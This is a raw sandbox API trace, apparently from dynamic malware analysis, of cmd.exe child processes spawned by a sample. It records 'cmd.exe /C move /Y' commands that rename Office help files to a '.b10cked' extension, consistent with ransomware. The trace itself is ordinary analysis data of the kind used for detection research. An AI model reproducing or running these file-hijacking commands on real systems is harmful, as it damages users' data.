[0202.220] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aea04 | out: phkResult=0x1aea04*=0x40) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x0, lpData=0x1aea10*=0xa8, lpcbData=0x1aea08*=0x1000) returned 0x2 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x1, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x0, lpData=0x1aea10*=0x1, lpcbData=0x1aea08*=0x1000) returned 0x2 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x0, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x40, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x40, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x0, lpData=0x1aea10*=0x40, lpcbData=0x1aea08*=0x1000) returned 0x2 [0202.220] RegCloseKey (hKey=0x40) returned 0x0 [0202.220] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aea04 | out: phkResult=0x1aea04*=0x40) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x0, lpData=0x1aea10*=0x40, lpcbData=0x1aea08*=0x1000) returned 0x2 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x1, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x0, lpData=0x1aea10*=0x1, lpcbData=0x1aea08*=0x1000) returned 0x2 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x0, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x9, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x9, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x0, lpData=0x1aea10*=0x9, lpcbData=0x1aea08*=0x1000) returned 0x2 [0202.221] RegCloseKey (hKey=0x40) returned 0x0 [0202.221] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.221] srand (_Seed=0x5b8863a4) [0202.221] 
GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked\"" [0202.221] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked\"" [0202.221] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.221] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.221] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.221] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.221] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.221] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.221] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.221] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.221] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.221] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.221] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.221] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.221] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.221] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.222] GetEnvironmentStringsW () returned 0x3b22d0* [0202.222] 
FreeEnvironmentStringsW (penv=0x3b22d0) returned 1 [0202.222] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.222] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.222] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.222] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.222] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.222] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.222] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.222] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.222] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.222] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.222] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af7d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.222] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af7d0, lpFilePart=0x1af7cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af7cc*="Desktop") returned 0x18 [0202.222] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.222] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af54c | out: lpFindFileData=0x1af54c) returned 0x3b0010 [0202.222] FindClose (in: hFindFile=0x3b0010 | out: hFindFile=0x3b0010) returned 1 [0202.222] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af54c | out: lpFindFileData=0x1af54c) returned 0x3b0010 [0202.222] FindClose (in: hFindFile=0x3b0010 | out: hFindFile=0x3b0010) returned 1 [0202.223] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af54c | out: lpFindFileData=0x1af54c) returned 0x3b0010 [0202.223] FindClose (in: 
hFindFile=0x3b0010 | out: hFindFile=0x3b0010) returned 1 [0202.223] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.223] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.223] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.223] GetEnvironmentStringsW () returned 0x3b2af0* [0202.223] FreeEnvironmentStringsW (penv=0x3b2af0) returned 1 [0202.223] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.223] GetConsoleOutputCP () returned 0x1b5 [0202.223] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.224] GetUserDefaultLCID () returned 0x409 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af910, cchData=128 | out: lpLCData="0") returned 2 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af910, cchData=128 | out: lpLCData="0") returned 2 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af910, cchData=128 | out: lpLCData="1") returned 2 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.224] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.224] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.225] GetConsoleTitleW (in: lpConsoleTitle=0x3a08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.225] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.225] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.225] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.225] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.226] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.226] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.226] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.226] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.226] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.226] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.226] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.229] GetConsoleTitleW (in: lpConsoleTitle=0x1af608, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.229] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.229] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.229] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.229] 
_wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.229] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.229] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.229] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.229] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.229] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.229] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.229] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.229] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.229] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.229] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.229] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.229] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.229] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.229] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.229] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.229] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.229] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.229] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.229] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.229] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.229] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.229] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.229] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.229] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.230] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.230] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.230] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.230] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.230] _wcsicmp (_String1="move", _String2="DPATH") 
returned 9 [0202.230] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.230] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.231] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.231] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.231] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af3c4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af3bc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af3bc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", 
_MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.233] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.233] _wcsicmp (_String1="MSONEN~1.HXN", _String2=".") returned 63 [0202.233] _wcsicmp (_String1="MSONEN~1.HXN", _String2="..") returned 63 [0202.233] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msonen~1.hxn")) returned 0x2022 [0202.233] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x3b1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.233] SetErrorMode (uMode=0x0) returned 0x0 [0202.233] SetErrorMode (uMode=0x1) returned 0x0 [0202.233] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", nBufferLength=0x104, lpBuffer=0x1aed4c, lpFilePart=0x1aed34 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", lpFilePart=0x1aed34*="MSONEN~1.HXN") returned 0x27 [0202.233] SetErrorMode (uMode=0x0) returned 0x1 [0202.233] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.234] _wcsicmp (_String1="MSONEN~1.HXN", _String2=".") returned 63 [0202.234] _wcsicmp (_String1="MSONEN~1.HXN", _String2="..") returned 63 [0202.234] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msonen~1.hxn")) returned 0x2022 [0202.234] SetErrorMode (uMode=0x0) returned 0x0 [0202.234] SetErrorMode (uMode=0x1) returned 0x0 [0202.234] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", nBufferLength=0x104, lpBuffer=0x1af1c8, lpFilePart=0x1aef60 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", lpFilePart=0x1aef60*="MSONEN~1.HXN") returned 0x27 [0202.234] SetErrorMode (uMode=0x0) returned 0x1 [0202.234] SetErrorMode (uMode=0x0) returned 0x0 [0202.234] SetErrorMode (uMode=0x1) returned 0x0 [0202.234] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1af3d0, lpFilePart=0x1aef60 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked", lpFilePart=0x1aef60*="MS.ONENOTE.14.1033.hxn.b10cked") returned 0x39 [0202.234] SetErrorMode (uMode=0x0) returned 0x1 [0202.234] SetLastError (dwErrCode=0x0) [0202.234] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~2\\ms.onenote.14.1033.hxn.b10cked")) returned 0xffffffff [0202.234] GetLastError () returned 0x2 [0202.234] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ae8dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae8dc) returned 0x3a0e70 [0202.234] FindNextFileW (in: hFindFile=0x3a0e70, lpFindFileData=0x1ae8dc | out: lpFindFileData=0x1ae8dc) returned 0 [0202.235] FindClose (in: hFindFile=0x3a0e70 | out: hFindFile=0x3a0e70) returned 1 [0202.235] GetLastError () returned 0x12 [0202.235] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ae8dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae8dc) returned 0x3a0e70 [0202.235] FindNextFileW (in: hFindFile=0x3a0e70, lpFindFileData=0x1ae8dc | out: lpFindFileData=0x1ae8dc) returned 0 [0202.235] FindClose (in: hFindFile=0x3a0e70 | out: hFindFile=0x3a0e70) returned 1 [0202.235] GetLastError () returned 0x12 [0202.236] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3b1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b1be0) returned 0x3a0e70 [0202.236] FindNextFileW (in: hFindFile=0x3a0e70, lpFindFileData=0x3b1be0 | out: lpFindFileData=0x3b1be0) returned 0 [0202.236] FindClose (in: hFindFile=0x3a0e70 | out: hFindFile=0x3a0e70) returned 1 [0202.236] GetLastError () returned 0x12 [0202.236] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3b1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3b1be0) returned 0x3a0e70 [0202.236] FindNextFileW (in: hFindFile=0x3a0e70, lpFindFileData=0x3b1be0 | out: lpFindFileData=0x3b1be0) returned 0 [0202.236] FindClose (in: hFindFile=0x3a0e70 | out: 
hFindFile=0x3a0e70) returned 1 [0202.236] GetLastError () returned 0x12 [0202.236] _get_osfhandle (_FileHandle=2) returned 0xb [0202.236] GetFileType (hFile=0xb) returned 0x2 [0202.582] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.582] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1aeaac | out: lpMode=0x1aeaac) returned 1 [0202.582] _get_osfhandle (_FileHandle=2) returned 0xb [0202.582] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1aeae0 | out: lpConsoleScreenBufferInfo=0x1aeae0) returned 1 [0202.583] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.583] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1aeb20 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.584] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1aeb04, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1aeb04*=0x2c) returned 1 [0202.584] longjmp () [0202.584] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.584] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.584] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.584] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.584] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.584] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.584] SetConsoleInputExeNameW () returned 0x1 [0202.584] GetConsoleOutputCP () returned 0x1b5 [0202.584] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.584] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.585] exit (_Code=1) Process: id = 
"472" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e00" os_pid = "0xe20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29306 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29307 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 29308 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 29309 start_va = 0x140000 